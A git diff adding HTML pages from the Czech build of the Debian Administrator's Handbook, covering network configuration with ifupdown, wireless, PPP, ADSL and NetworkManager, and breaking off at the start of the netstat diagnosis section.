+				</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.automated-installation.html"><strong>Předcházející</strong>12.3. Automated Installation</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="workstation.html"><strong>Další</strong>Kapitola 13. Workstation</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-config.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-config.html
new file mode 100644
index 000000000..6a7c36a26
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-config.html
@@ -0,0 +1,541 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.2. Configuring the Network</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="next"
+        href="sect.hostname-name-service.html"
+        title="8.3. Setting the Hostname and Configuring the Name Service" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.network-config.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="basic-configuration.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.hostname-name-service.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.network-config"></a>8.2. Configuring the Network</h2></div></div></div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.networking-basics"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Essential network concepts (Ethernet, IP address, subnet, broadcast)</strong></p></div></div></div><a
+            id="id-1.11.6.2.2"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.3"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.4"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.5"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.6"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.7"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.8"
+            class="indexterm"></a><div
+            class="para">
+			Most modern local networks use the Ethernet protocol, where data is split into small blocks called frames and transmitted on the wire one frame at a time. Data speeds vary from 10 Mb/s for older Ethernet cards to 10 Gb/s in the newest cards (with the most common rate currently growing from 100 Mb/s to 1 Gb/s). The most widely used cables are called 10BASE-T, 100BASE-T, 1000BASE-T or 10GBASE-T depending on the throughput they can reliably provide (the T stands for “twisted pair”); those cables end in an RJ45 connector. There are other cable types, used mostly for speeds of 1 Gb/s and above.
+		</div><a
+            id="id-1.11.6.2.10"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.11"
+            class="indexterm"></a><div
+            class="para">
+			An IP address is a number used to identify a network interface on a computer on a local network or the Internet. In the currently most widespread version of IP (IPv4), this number is encoded in 32 bits, and is usually represented as 4 numbers separated by periods (e.g. <code
+              class="literal">192.168.0.1</code>), each number being between 0 and 255 (inclusive, which corresponds to 8 bits of data). The next version of the protocol, IPv6, extends this addressing space to 128 bits, and the addresses are generally represented as a series of hexadecimal numbers separated by colons (e.g., 2001:0db8:13bb:0002:0000:0000:0000:0020, or 2001:db8:13bb:2::20 for short).
+		</div><a
+            id="id-1.11.6.2.13"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.14"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.15"
+            class="indexterm"></a><div
+            class="para">
+			A subnet mask (netmask) defines in its binary code which portion of an IP address corresponds to the network, the remainder specifying the machine. In the example of configuring a static IPv4 address given here, the subnet mask, <code
+              class="literal">255.255.255.0</code> (24 “1”s followed by 8 “0”s in binary representation) indicates that the first 24 bits of the IP address correspond to the network address, and the other 8 are specific to the machine. In IPv6, for readability, only the number of “1”s is expressed; the netmask for an IPv6 network could, thus, be <code
+              class="literal">64</code>.
+		</div><div
+            class="para">
+			The network address is an IP address in which the part describing the machine's number is 0. The range of IPv4 addresses in a complete network is often indicated by the syntax, <span
+              class="emphasis"><em>a.b.c.d/e</em></span>, in which <span
+              class="emphasis"><em>a.b.c.d</em></span> is the network address and <span
+              class="emphasis"><em>e</em></span> is the number of bits affected to the network part in an IP address. The example network would thus be written: <code
+              class="literal">192.168.0.0/24</code>. The syntax is similar in IPv6: <code
+              class="literal">2001:db8:13bb:2::/64</code>.
+		</div><a
+            id="id-1.11.6.2.18"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.19"
+            class="indexterm"></a><div
+            class="para">
+			A router is a machine that connects several networks to each other. All traffic coming through a router is guided to the correct network. To do this, the router analyzes incoming packets and redirects them according to the IP address of their destination. The router is often known as a gateway; in this configuration, it works as a machine that helps reach out beyond a local network (towards an extended network, such as the Internet).
+		</div><a
+            id="id-1.11.6.2.21"
+            class="indexterm"></a><div
+            class="para">
+			The special broadcast address connects all the stations in a network. Almost never “routed”, it only functions on the network in question. Specifically, it means that a data packet addressed to the broadcast never passes through the router.
+		</div><div
+            class="para">
+			This chapter focuses on IPv4 addresses, since they are currently the most commonly used. The details of the IPv6 protocol are approached in <a
+              class="xref"
+              href="sect.ipv6.html">10.5 – „IPv6“</a>, but the concepts remain the same.
+		</div></div><div
+          class="para">
+			The network is automatically configured during the initial installation. If Network Manager gets installed (which is generally the case for full desktop installations), then it might be that no configuration is actually required (for example, if you rely on DHCP on a wired connection and have no specific requirements). If a configuration is required (for example for a WiFi interface), then it will create the appropriate file in <code
+            class="filename">/etc/NetworkManager/system-connections/</code>.
+		</div><div
+          class="para">
+			If Network Manager is not installed, then the installer will configure <span
+            class="pkg pkg">ifupdown</span> by creating the <code
+            class="filename">/etc/network/interfaces</code> file. A line starting with <code
+            class="literal">auto</code> gives a list of interfaces to be automatically configured on boot by the <code
+            class="literal">networking</code> service.
+		</div><div
+          class="para">
+			In a server context, <span
+            class="pkg pkg">ifupdown</span> is thus the network configuration tool that you usually get. That is why we will cover it in the next sections.
+		</div><a
+          id="id-1.11.6.6"
+          class="indexterm"></a><a
+          id="id-1.11.6.7"
+          class="indexterm"></a><a
+          id="id-1.11.6.8"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> NetworkManager</strong></p></div></div></div><a
+            id="id-1.11.6.9.2"
+            class="indexterm"></a><div
+            class="para">
+			If Network Manager is particularly recommended in roaming setups (see <a
+              class="xref"
+              href="sect.network-config.html#sect.roaming-network-config">8.2.5 – „Automatic Network Configuration for Roaming Users“</a>), it is also perfectly usable as the default network management tool. You can create “System connections” that are used as soon as the computer boots either manually with a <code
+              class="filename">.ini</code>-like file in <code
+              class="filename">/etc/NetworkManager/system-connections/</code> or through a graphical tool (<code
+              class="command">nm-connection-editor</code>). Just remember to deactivate all entries in <code
+              class="filename">/etc/network/interfaces</code> if you want Network Manager to handle them. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.gnome.org/Projects/NetworkManager/SystemSettings">https://wiki.gnome.org/Projects/NetworkManager/SystemSettings</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://developer.gnome.org/NetworkManager/1.6/ref-settings.html">https://developer.gnome.org/NetworkManager/1.6/ref-settings.html</a></div>
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.interface-ethernet"></a>8.2.1. Ethernet Interface</h3></div></div></div><div
+            class="para">
+				If the computer has an Ethernet card, the IP network that is associated with it must be configured by choosing from one of two methods. The simplest method is dynamic configuration with DHCP, and it requires a DHCP server on the local network. It may indicate a desired hostname, corresponding to the <code
+              class="literal">hostname</code> setting in the example below. The DHCP server then sends configuration settings for the appropriate network.
+			</div><a
+            id="id-1.11.6.10.3"
+            class="indexterm"></a><a
+            id="id-1.11.6.10.4"
+            class="indexterm"></a><div
+            class="example"><a
+              xmlns=""
+              id="example.config-dhcp"></a><p
+              class="title"><strong>Příklad 8.1. DHCP configuration</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+auto enp0s31f6
+iface enp0s31f6 inet dhcp
+  hostname arrakis
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Names of network interfaces</strong></p></div></div></div><a
+              id="id-1.11.6.10.6.2"
+              class="indexterm"></a><a
+              id="id-1.11.6.10.6.3"
+              class="indexterm"></a><a
+              id="id-1.11.6.10.6.4"
+              class="indexterm"></a><a
+              id="id-1.11.6.10.6.5"
+              class="indexterm"></a><div
+              class="para">
+				By default, the kernel attributes generic names such a <code
+                class="literal">eth0</code> (for wired Ethernet) or <code
+                class="literal">wlan0</code> (for WiFi) to the network interfaces. The number in those names is a simple incremental counter representing the order in which they have been detected. With modern hardware, that order might change for each reboot and thus the default names are not reliable.
+			</div><div
+              class="para">
+				Fortunately, systemd and udev are able to rename the interfaces as soon as they appear. The default name policy is defined by <code
+                class="filename">/lib/systemd/network/99-default.link</code> (see <span
+                class="citerefentry"><span
+                  class="refentrytitle">systemd.link</span>(5)</span> for an explanation of the <code
+                class="literal">NamePolicy</code> entry in that file). In practice, the names are often based on the device's physical location (as guessed by where they are connected) and you will see names starting with <code
+                class="literal">en</code> for wired ethernet and <code
+                class="literal">wl</code> for WiFi. In the example above, the rest of the name indicates, in abbreviated form, a PCI (<code
+                class="literal">p</code>) bus number (<code
+                class="literal">0</code>), a slot number (<code
+                class="literal">s31</code>), a function number (<code
+                class="literal">f6</code>).
+			</div><div
+              class="para">
+				Obviously, you are free to override this policy and/or to complement it to customize the names of some specific interfaces. You can find out the names of the network interfaces in the output of <code
+                class="command">ip addr</code> (or as filenames in <code
+                class="filename">/sys/class/net/</code>).
+			</div></div><div
+            class="para">
+				A “static” configuration must indicate network settings in a fixed manner. This includes at least the IP address and subnet mask; network and broadcast addresses are also sometimes listed. A router connecting to the exterior will be specified as a gateway.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.static-network"></a><p
+              class="title"><strong>Příklad 8.2. Static configuration</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+auto enp0s31f6
+iface enp0s31f6 inet static
+  address 192.168.0.3
+  netmask 255.255.255.0
+  broadcast 192.168.0.255
+  network 192.168.0.0
+  gateway 192.168.0.1
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Multiple addresses</strong></p></div></div></div><div
+              class="para">
+				It is possible not only to associate several interfaces to a single, physical network card, but also several IP addresses to a single interface. Remember also that an IP address may correspond to any number of names via DNS, and that a name may also correspond to any number of numerical IP addresses.
+			</div><div
+              class="para">
+				As you can guess, the configurations can be rather complex, but these options are only used in very special cases. The examples cited here are typical of the usual configurations.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.interface-wireless"></a>8.2.2. Wireless Interface</h3></div></div></div><a
+            id="id-1.11.6.11.2"
+            class="indexterm"></a><div
+            class="para">
+				Getting wireless network cards to work can be a bit more challenging. First of all, they often require the installation of proprietary firmwares which are not installed by default in Debian. Then wireless networks rely on cryptography to restrict access to authorized users only, this implies storing some secret key in the network configuration. Let's tackle those topics one by one.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.11.6.11.4"></a>8.2.2.1. Installing the required firmwares</h4></div></div></div><a
+              id="id-1.11.6.11.4.2"
+              class="indexterm"></a><a
+              id="id-1.11.6.11.4.3"
+              class="indexterm"></a><div
+              class="para">
+					First you have to enable the non-free repository in APT's sources.list file: see <a
+                class="xref"
+                href="apt.html#sect.apt-sources.list">6.1 – „Filling in the <code
+                  class="filename">sources.list</code> File“</a> for details about this file. Many firmware are proprietary and are thus located in this repository. You can try to skip this step if you want, but if the next step doesn't find the required firmware, retry after having enabled the non-free section.
+				</div><div
+              class="para">
+					Then you have to install the appropriate <code
+                class="literal">firmware-*</code> packages. If you don't know which package you need, you can install the <span
+                class="pkg pkg">isenkram</span> package and run its <code
+                class="command">isenkram-autoinstall-firmware</code> command. The packages are often named after the hardware manufacturer or the corresponding kernel module: <span
+                class="pkg pkg">firmware-iwlwifi</span> for Intel wireless cards, <span
+                class="pkg pkg">firmware-atheros</span> for Qualcomm Atheros, <span
+                class="pkg pkg">firmware-ralink</span> for Ralink, etc. A reboot is then recommended because the kernel driver usually looks for the firmware files when it is first loaded and no longer afterwards.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.11.6.11.5"></a>8.2.2.2. Wireless specific entries in <code
+                      class="filename">/etc/network/interfaces</code></h4></div></div></div><a
+              id="id-1.11.6.11.5.2"
+              class="indexterm"></a><div
+              class="para">
+					<span
+                class="emphasis"><em>ifupdown</em></span> is able to manage wireless interfaces but it needs the help of the <span
+                class="pkg pkg">wpasupplicant</span> package which provides the required integration between <span
+                class="emphasis"><em>ifupdown</em></span> and the <code
+                class="command">wpa_supplicant</code> command used to configure the wireless interfaces (when using WPA/WPA2 encryption). The usual entry in <code
+                class="filename">/etc/network/interfaces</code> needs to be extended with two supplementary parameters to specify the name of the wireless network (aka its SSID) and the <span
+                class="emphasis"><em>Pre-Shared Key</em></span> (PSK).
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.config-wireless"></a><p
+                class="title"><strong>Příklad 8.3. DHCP configuration for a wireless interface</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+auto wlp4s0
+iface wlp4s0 inet dhcp
+  wpa-ssid Falcot
+  wpa-psk ccb290fd4fe6b22935cbae31449e050edd02ad44627b16ce0151668f5f53c01b
+</pre></div></div><div
+              class="para">
+					The <code
+                class="literal">wpa-psk</code> parameter can contain either the plain text passphrase or its hashed version generated with <code
+                class="command">wpa_passphrase <em
+                  class="replaceable">SSID</em> <em
+                  class="replaceable">passphrase</em></code>. If you use an unencrypted wireless connection, then you should put a <code
+                class="literal">wpa-key-mgmt NONE</code> and no <code
+                class="literal">wpa-psk</code> entry. For more information about the possible configuration options, have a look at <code
+                class="filename">/usr/share/doc/wpasupplicant/README.Debian.gz</code>.
+				</div><div
+              class="para">
+					At this point, you should consider restricting the read permissions on <code
+                class="filename">/etc/network/interfaces</code> to the root user only since the file contains a private key that not all users should have access to.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>HISTORY</em></span> WEP encryption</strong></p></div></div></div><a
+                id="id-1.11.6.11.5.7.2"
+                class="indexterm"></a><div
+                class="para">
+					Usage of the deprecated WEP encryption protocol is possible with the <span
+                  class="pkg pkg">wireless-tools</span> package. See <code
+                  class="filename">/usr/share/doc/wireless-tools/README.Debian</code> for instructions.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ppp-rtc"></a>8.2.3. Connecting with PPP through a PSTN Modem</h3></div></div></div><a
+            id="id-1.11.6.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.3"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.4"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.5"
+            class="indexterm"></a><div
+            class="para">
+				A point to point (PPP) connection establishes an intermittent connection; this is the most common solution for connections made with a telephone modem (“PSTN modem”, since the connection goes over the public switched telephone network).
+			</div><div
+            class="para">
+				A connection by telephone modem requires an account with an access provider, including a telephone number, username, password, and, sometimes the authentication protocol to be used. Such a connection is configured using the <code
+              class="command">pppconfig</code> tool in the Debian package of the same name. By default, it sets up a connection named <code
+              class="literal">provider</code> (as in Internet service provider). When in doubt about the authentication protocol, choose <span
+              class="emphasis"><em>PAP</em></span>: it is offered by the majority of Internet service providers.
+			</div><a
+            id="id-1.11.6.12.8"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.9"
+            class="indexterm"></a><div
+            class="para">
+				After configuration, it is possible to connect using the <code
+              class="command">pon</code> command (giving it the name of the connection as a parameter, when the default value of <code
+              class="literal">provider</code> is not appropriate). The link is disconnected with the <code
+              class="command">poff</code> command. These two commands can be executed by the root user, or by any other user, provided they are in the <code
+              class="literal">dip</code> group.
+			</div><a
+            id="id-1.11.6.12.11"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.12"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.adsl"></a>8.2.4. Connecting through an ADSL Modem</h3></div></div></div><a
+            id="id-1.11.6.13.2"
+            class="indexterm"></a><a
+            id="id-1.11.6.13.3"
+            class="indexterm"></a><a
+            id="id-1.11.6.13.4"
+            class="indexterm"></a><div
+            class="para">
+				The generic term “ADSL modem” covers a multitude of devices with very different functions. The modems that are simplest to use with Linux are those that have an Ethernet interface (and not only a USB interface). These tend to be popular; most ADSL Internet service providers lend (or lease) a “box” with Ethernet interfaces. Depending on the type of modem, the configuration required can vary widely.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.adsl-pppoe"></a>8.2.4.1. Modems Supporting PPPOE</h4></div></div></div><a
+              id="id-1.11.6.13.6.2"
+              class="indexterm"></a><a
+              id="id-1.11.6.13.6.3"
+              class="indexterm"></a><div
+              class="para">
+					Some Ethernet modems work with the PPPOE protocol (Point to Point Protocol over Ethernet). The <code
+                class="command">pppoeconf</code> tool (from the package with the same name) will configure the connection. To do so, it modifies the <code
+                class="filename">/etc/ppp/peers/dsl-provider</code> file with the settings provided and records the login information in the <code
+                class="filename">/etc/ppp/pap-secrets</code> and <code
+                class="filename">/etc/ppp/chap-secrets</code> files. It is recommended to accept all modifications that it proposes.
+				</div><div
+              class="para">
+					Once this configuration is complete, you can open the ADSL connection with the command, <code
+                class="command">pon dsl-provider</code> and disconnect with <code
+                class="command">poff dsl-provider</code>.
+				</div><a
+              id="id-1.11.6.13.6.6"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Starting <code
+                          class="command">ppp</code> at boot</strong></p></div></div></div><a
+                id="id-1.11.6.13.6.7.2"
+                class="indexterm"></a><a
+                id="id-1.11.6.13.6.7.3"
+                class="indexterm"></a><div
+                class="para">
+					PPP connections over ADSL are, by definition, intermittent. Since they are usually not billed according to time, there are few downsides to the temptation of keeping them always open. The standard means to do so is to use the init system.
+				</div><div
+                class="para">
+					With systemd, adding an automatically restarting task for the ADSL connection is a simple matter of creating a “unit file” such as <code
+                  class="filename">/etc/systemd/system/adsl-connection.service</code>, with contents such as the following:
+				</div><pre
+                class="programlisting">[Unit]
+Description=ADSL connection
+
+[Service]
+Type=forking
+ExecStart=/usr/sbin/pppd call dsl-provider
+Restart=always
+
+[Install]
+WantedBy=multi-user.target</pre><div
+                class="para">
+					Once this unit file has been defined, it needs to be enabled with <code
+                  class="command">systemctl enable adsl-connection</code>. Then the loop can be started manually with <code
+                  class="command">systemctl start adsl-connection</code>; it will also be started automatically on boot.
+				</div><div
+                class="para">
+					On systems not using <code
+                  class="command">systemd</code> (including <span
+                  class="distribution distribution">Wheezy</span> and earlier versions of Debian), the standard SystemV init works differently. On such systems, all that is needed is to add a line such as the following at the end of the <code
+                  class="filename">/etc/inittab</code> file; then, any time the connection is disconnected, <code
+                  class="command">init</code> will reconnect it.
+				</div><pre
+                class="programlisting">
+adsl:2345:respawn:/usr/sbin/pppd call dsl-provider
+</pre><div
+                class="para">
+					For ADSL connections that auto-disconnect on a daily basis, this method reduces the duration of the interruption.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.adsl-pptp"></a>8.2.4.2. Modems Supporting PPTP</h4></div></div></div><a
+              id="id-1.11.6.13.7.2"
+              class="indexterm"></a><div
+              class="para">
+					The PPTP (Point-to-Point Tunneling Protocol) protocol was created by Microsoft. Deployed at the beginning of ADSL, it was quickly replaced by PPPOE. If this protocol is forced on you, see <a
+                class="xref"
+                href="sect.virtual-private-network.html#sect.pptp">10.2.4 – „PPTP“</a>.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.adsl-dhcp"></a>8.2.4.3. Modems Supporting DHCP</h4></div></div></div><div
+              class="para">
+					When a modem is connected to the computer by an Ethernet cable (crossover cable) you typically configure a network connection by DHCP on the computer; the modem automatically acts as a gateway by default and takes care of routing (meaning that it manages the network traffic between the computer and the Internet).
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Crossover cable for a direct Ethernet connection</strong></p></div></div></div><a
+                id="id-1.11.6.13.8.3.2"
+                class="indexterm"></a><div
+                class="para">
+					Computer network cards expect to receive data on specific wires in the cable, and send their data on others. When you connect a computer to a local network, you usually connect a cable (straight or crossover) between the network card and a repeater or switch. However, if you want to connect two computers directly (without an intermediary switch or repeater), you must route the signal sent by one card to the receiving side of the other card, and vice-versa. This is the purpose of a crossover cable, and the reason it is used.
+				</div><div
+                class="para">
+					Note that this distinction has become almost irrelevant over time, as modern network cards are able do detect the type of cable present and adapt accordingly, so it won't be unusual that both kinds of cable will work in a given location.
+				</div></div><div
+              class="para">
+					Most “ADSL routers” on the market can be used like this, as do most of the ADSL modems provided by Internet services providers.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.roaming-network-config"></a>8.2.5. Automatic Network Configuration for Roaming Users</h3></div></div></div><a
+            id="id-1.11.6.14.2"
+            class="indexterm"></a><a
+            id="id-1.11.6.14.3"
+            class="indexterm"></a><div
+            class="para">
+				Many Falcot engineers have a laptop computer that, for professional purposes, they also use at home. The network configuration to use differs according to location. At home, it may be a wifi network (protected by a WPA key), while the workplace uses a wired network for greater security and more bandwidth.
+			</div><div
+            class="para">
+				To avoid having to manually connect or disconnect the corresponding network interfaces, administrators installed the <span
+              class="pkg pkg">network-manager</span> package on these roaming machines. This software enables a user to easily switch from one network to another using a small icon displayed in the notification area of their graphical desktop. Clicking on this icon displays a list of available networks (both wired and wireless), so they can simply choose the network they wish to use. The program saves the configuration for the networks to which the user has already connected, and automatically switches to the best available network when the current connection drops.
+			</div><div
+            class="para">
+				In order to do this, the program is structured in two parts: a daemon running as root handles activation and configuration of network interfaces and a user interface controls this daemon. PolicyKit handles the required authorizations to control this program and Debian configured PolicyKit in such a way so that members of the netdev group can add or change Network Manager connections.
+			</div><div
+            class="para">
+				Network Manager knows how to handle various types of connections (DHCP, manual configuration, local network), but only if the configuration is set with the program itself. This is why it will systematically ignore all network interfaces in <code
+              class="filename">/etc/network/interfaces</code> for which it is not suited. Since Network Manager doesn't give details when no network connections are shown, the easy way is to delete from <code
+              class="filename">/etc/network/interfaces</code> any configuration for all interfaces that must be managed by Network Manager.
+			</div><div
+            class="para">
+				Note that this program is installed by default when the “Desktop Environment” task is chosen during initial installation.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="basic-configuration.html"><strong>Předcházející</strong>Kapitola 8. Basic Configuration: Network, Account...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.hostname-name-service.html"><strong>Další</strong>8.3. Setting the Hostname and Configuring the Nam...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-diagnosis-tools.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-diagnosis-tools.html
new file mode 100644
index 000000000..4080e3bf5
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.network-diagnosis-tools.html
@@ -0,0 +1,315 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.8. Network Diagnosis Tools</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.dhcp.html"
+        title="10.7. DHCP" /><link
+        rel="next"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.network-diagnosis-tools.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dhcp.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="network-services.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.network-diagnosis-tools"></a>10.8. Network Diagnosis Tools</h2></div></div></div><div
+          class="para">
+			When a network application does not run as expected, it is important to be able to look under the hood. Even when everything seems to run smoothly, running a network diagnosis can help ensure everything is working as it should. Several diagnosis tools exists for this purpose; each one operates on a different level.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.netstat"></a>10.8.1. Local Diagnosis: <code
+                    class="command">netstat</code></h3></div></div></div><a
+            id="id-1.13.11.3.2"
+            class="indexterm"></a><div
+            class="para">
+				Let's first mention the <code
+              class="command">netstat</code> command (in the <span
+              class="pkg pkg">net-tools</span> package); it displays an instant summary of a machine's network activity. When invoked with no argument, this command lists all open connections; this list can be very verbose since it includes many Unix-domain sockets (widely used by daemons) which do not involve the network at all (for example, <code
+              class="literal">dbus</code> communication, <code
+              class="literal">X11</code> traffic, and communications between virtual filesystems and the desktop).
+			</div><div
+            class="para">
+				Common invocations therefore use options that alter <code
+              class="command">netstat</code>'s behavior. The most frequently used options include:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-t</code>, which filters the results to only include TCP connections;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
